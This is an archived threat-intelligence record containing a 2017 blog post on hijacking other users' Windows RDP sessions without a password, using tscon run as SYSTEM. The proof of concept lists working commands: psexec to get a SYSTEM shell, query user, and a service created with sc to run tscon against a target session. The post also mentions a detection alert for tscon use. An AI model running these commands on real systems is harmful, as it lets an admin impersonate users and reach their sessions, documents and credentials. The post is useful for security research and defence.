{
	"id": "e97982fb-17ca-4b70-888b-c107e14a2525",
	"created_at": "2026-04-06T00:10:38.164174Z",
	"updated_at": "2026-04-10T03:20:25.022964Z",
	"deleted_at": null,
	"sha1_hash": "d4d9a9e9880bc663af110aba30c7055e007e3c19",
	"title": "Passwordless RDP Session Hijacking Feature All Windows versions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 107549,
	"plain_text": "Passwordless RDP Session Hijacking Feature All Windows versions\r\nArchived: 2026-04-05 20:39:11 UTC\r\n* This post periodically updated, all updates in the end of the post.\r\nUpdate: Added Windows Server 2016 Datacenter Demo\r\nHey there,\r\nBlogpost in 20 seconds: Fun with sethc backdoored host :) somewhere in the internet:\r\nEtt fel inträffade.\r\nDet går inte att köra JavaScript.\r\nRecently i've played with sethc/utilman logon screen backdoors, and almost everytime i used just command line.\r\nOccasionally i've looked at Users tab in Task Manager (taskmgr.exe), and clicked connect button, and surprisingly\r\ni've got connected to selected user's session.\r\nhttp://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html\r\nPage 1 of 5\n\nWhen i checked it again with local admin rights, it failed by asking user's password.\r\nWhy and how that happened? Let's dig deeper.\r\nRelated to Microsoft documentation:\r\nhttps://technet.microsoft.com/en-us/library/cc770988(v=ws.11).aspx\r\nhttps://technet.microsoft.com/en-us/library/cc731007(v=ws.11).aspx\r\nwe can see couple important remarks:\r\nRemarks\r\nYou must have Full Control access permission or Connect special access permission to connect to another\r\nsession.\r\nThe /dest:\u003cSessionName\u003e parameter allows you to connect the session of another user to a different\r\nsession.\r\nhttp://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html\r\nPage 2 of 5\n\nIf you do not specify a password in the \u003cPassword\u003e parameter, and the target session belongs to a user\r\nother than the current one, tscon fails (not really).\r\nI've got it! Sticky Keys (cmd backdoor) at windows login screen runs with NT AUTHORITY/SYSTEM and have\r\nFull Control access permission, and can connect to EVERY user session without asking for a password.\r\nSo we've got a session hijacking here. The most funny thing is that the legit user isn't asked for logout, by using\r\nthis technique the user just will be kicked out of the session without any notification.\r\nAttack Vector Details:\r\nA privileged user, which can gain command execution with NT AUTHORITY/SYSTEM rights can hijack any\r\ncurrently logged in user's session, without any knowledge about his credentials.\r\nTerminal Services session can be either in connected or disconnected state.\r\nThis is high risk vulnerability which allows any local admin to hijack a session and get access to:\r\n1. Domain admin session.\r\n2. Any unsaved documents, that hijacked user works on.\r\n3. Any other systems/applications in which hijacked user previously logged in (May include another Remote\r\nDesktop sessions, Network Share mappings, applications which require another credentials, E-mail etc.)\r\nfeature\r\nExample scenario: \r\nSome bank employee have access to billing system, and it's credentials to login.\r\nOne day, he come to work, logging in to the billing system and start to work. At lunch time he will lock his\r\nworkstation, and out to lunch.\r\nThen, system administrator gets to employee's workstation, and logs in with his administrator's account.\r\nAccording to the bank's policy, administrator's account should not have access to the billing system, but with\r\ncouple of built-in commands in windows, this system administrator will hijack employee's desktop which he\r\nleaved locked. From now, sysadmin can perform malicious actions in billing system as billing employee account.\r\nThere are huge amount of scenarios like this.\r\nFurthermore, an attacker doesn't need to use tools like metasploit, incognito, mimikatz etc, which is commonly\r\nused for user's token manipulation and impersonating logged in users. Everything is done with built-in\r\ncommands. Every admin can impersonate any logged in user either locally with physical access or remotely via\r\nRemote Desktops (see PoC).\r\nTested on:\r\nWindows 2016 (Confirmed by Kevin Beaumont @GossiTheDog)\r\nWindows 2012 R2\r\nhttp://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html\r\nPage 3 of 5\n\nWindows 2008\r\nWindows 10\r\nWindows 7\r\nWe can talk about endless amount of examples.\r\nIt can be done remotely, as shown in Proof of Concepts.\r\nAn attacker can hijack active or disconnected session remotely via remote desktops.\r\nI use this technique about three weeks in my on-going penetration tests on daily basis. It in very simple way\r\nhelps me to get access to sensitive information like emails, opened documents, clear-text passwords that\r\nadministrators write down in notepad (not intended for saving, but for temporally writing it somewhere), opened\r\nRDP sessions to another external domains (think cloud), or another applications that make use of different login\r\ncredentials.\r\nSomeone can say, if you admin, you can dump server's memory and parse it. That's correct, but you don't need it\r\nany more. Just two simple commands and you are in. The most incredible thing, is that I don't need to know the\r\ncredentials of hijacked user, it is pure passwordless hijacking.\r\nA successful attack heavily related on time and gathered information. If you need to dump a memory, to get\r\nyour sensitive info, you're in problem. That means that you've tried all quick-wins that you know.\r\nIn example of hijacking user (active or disconnected) while he is working now remotely on some sensitive server\r\nthat i have no access to, and haven't even knew about it, this technique allows me to compromise that server in\r\nless than a minute. Everything is real and from my own experience.\r\nFurthermore, as I understand it is very hard to catch if this attack happen. Kevin Beaumont @GossiTheDog make\r\nan alert on tscon.exe usage, with Microsoft OMS.\r\nI had a conversation about this finding with Benjamin Delpy @gentilkiwi author of mimikatz:\r\n\"That is normal Windows API, that's the design flow, they use it. As mentioned earlier, if you admin, you can do\r\neverything. But here is the point. Why and HOW you become admin? If some unprivileged user becomes admin\r\nusing some kind of local privilege escalation - that's the problem and not the design flow we are talking about. You\r\ncan do everything, even patch terminal services the way that it will accept your token and allow shadowing mode,\r\nwithout user's knowledge.\", he said.\r\nProof of Concept:\r\nMicrosoft documentation helps us to do that from command line:\r\nAll we need is NT AUTHORITY/SYSTEM command line. \r\nEasiest method with psexec, but requires psexec.exe to be there: \r\nhttp://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html\r\nPage 4 of 5\n\npsexec -s \\\\localhost cmd\r\nAnother method is to create a service that will connect selected session to ours.\r\n1. Get all sessions information:\r\nC:\\Windows\\system32\u003equery user\r\n USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME\r\n administrator 1 Disc 1 3/12/2017 3:07 PM\r\n\u003elocaladmin rdp-tcp#55 2 Active . 3/12/2017 3:10 PM\r\nC:\\Windows\\system32\u003e\r\n2. Create service which will hijack user's session:\r\nC:\\Windows\\system32\u003esc create sesshijack binpath= \"cmd.exe /k tscon 1 /dest:rdp-tcp#55\"\r\n[SC] CreateService SUCCESS\r\n3. Start service:\r\nnet setart sesshijack\r\nRight after that your session will be replaced with target session.\r\nSource: http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html\r\nhttp://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html"
	],
	"report_names": [
		"0-day-or-feature-privilege-escalation.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434238,
	"ts_updated_at": 1775791225,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d4d9a9e9880bc663af110aba30c7055e007e3c19.pdf",
		"text": "https://archive.orkl.eu/d4d9a9e9880bc663af110aba30c7055e007e3c19.txt",
		"img": "https://archive.orkl.eu/d4d9a9e9880bc663af110aba30c7055e007e3c19.jpg"
	}
}